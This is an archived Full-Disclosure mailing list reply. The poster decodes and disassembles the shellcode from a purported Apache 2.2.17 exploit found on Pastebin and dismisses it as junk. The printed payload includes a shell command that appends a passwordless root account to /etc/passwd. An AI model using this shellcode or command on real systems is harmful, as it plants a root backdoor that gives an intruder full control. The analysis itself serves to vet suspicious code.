[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Apache 2.2.17 exploit?

To: "Darren Martyn" <d.martyn.fulldisclosure@xxxxxxxxx>
Subject: Re: [Full-disclosure] Apache 2.2.17 exploit?
From: nix@xxxxxxxxxxxxxxxx
Date: Mon, 3 Oct 2011 17:57:35 +0300

> I regularly trawl Pastebin.com to find code - often idiots leave some 0day
> and similar there and it is nice to find.
>
> Well, seeing as I have no test boxes at the moment, can someone check this
> code in a VM? I am not sure if it is legit or not.
>
> http://pastebin.com/ygByEV2e
>
> Thanks :)
>
> ~Darren

I decoded shellcode a bit. Looks quite trash to me.

ë*^1À^ÈF^G^ÈF
^ÈFG^ÉvI^Í^^H^É^M^Í^^K^É^Q^ÉFU°^K^Éó^ÍNI^ÍVUÍ^ÀèÑÿÿÿ
/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >>
/etc/passwd#AAAABBBBCCCCDDDD

Here's disassembly:

0000000  EB2A              jmp short 0x2c
00000002  5E                pop esi
00000003  31C0              xor eax,eax
00000005  884607            mov [esi+0x7],al
00000008  88460A            mov [esi+0xa],al
0000000B  884647            mov [esi+0x47],al
0000000E  897649            mov [esi+0x49],esi
00000011  8D5E08            lea ebx,[esi+0x8]
00000014  895E4D            mov [esi+0x4d],ebx
00000017  8D5E0B            lea ebx,[esi+0xb]
0000001A  895E51            mov [esi+0x51],ebx
0000001D  894655            mov [esi+0x55],eax
00000020  B00B              mov al,0xb
00000022  89F3              mov ebx,esi
00000024  8D4E49            lea ecx,[esi+0x49]
00000027  8D5655            lea edx,[esi+0x55]
0000002A  CD80              int 0x80
0000002C  E8D1FFFFFF        call dword 0x2
00000031  2F                das
00000032  62696E            bound ebp,[ecx+0x6e]
00000035  2F                das
00000036  7368              jnc 0xa0
00000038  232D63232F62      and ebp,[dword 0x622f2363]
0000003E  696E2F6563686F    imul ebp,[esi+0x2f],dword 0x6f686365
00000045  207730            and [edi+0x30],dh
00000048  3030              xor [eax],dh
0000004A  743A              jz 0x86
0000004C  3A30              cmp dh,[eax]
0000004E  3A30              cmp dh,[eax]
00000050  3A7334            cmp dh,[ebx+0x34]
00000053  66656D            gs insw
00000056  3064653A          xor [ebp+0x3a],ah
0000005A  2F                das
0000005B  726F              jc 0xcc
0000005D  6F                outsd
0000005E  743A              jz 0x9a
00000060  2F                das
00000061  62696E            bound ebp,[ecx+0x6e]
00000064  2F                das
00000065  626173            bound esp,[ecx+0x73]
00000068  68203E3E20        push dword 0x203e3e20
0000006D  2F                das
0000006E  657463            gs jz 0xd4
00000071  2F                das
00000072  7061              jo 0xd5
00000074  7373              jnc 0xe9
00000076  7764              ja 0xdc
00000078  234141            and eax,[ecx+0x41]
0000007B  41                inc ecx
0000007C  41                inc ecx
0000007D  42                inc edx
0000007E  42                inc edx
0000007F  42                inc edx
00000080  42                inc edx
00000081  43                inc ebx
00000082  43                inc ebx
00000083  43                inc ebx
00000084  43                inc ebx
00000085  44                inc esp
00000086  44                inc esp
00000087  44                inc esp
00000088  44                inc esp


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Apache 2.2.17 exploit?
  - From: Darren Martyn

Prev by Date: Re: [Full-disclosure] VPN providers and any providers in general...
Next by Date: Re: [Full-disclosure] VPN providers and any providers in general...
Previous by thread: Re: [Full-disclosure] Apache 2.2.17 exploit?
Next by thread: Re: [Full-disclosure] Apache 2.2.17 exploit?
Index(es):
- Date
- Thread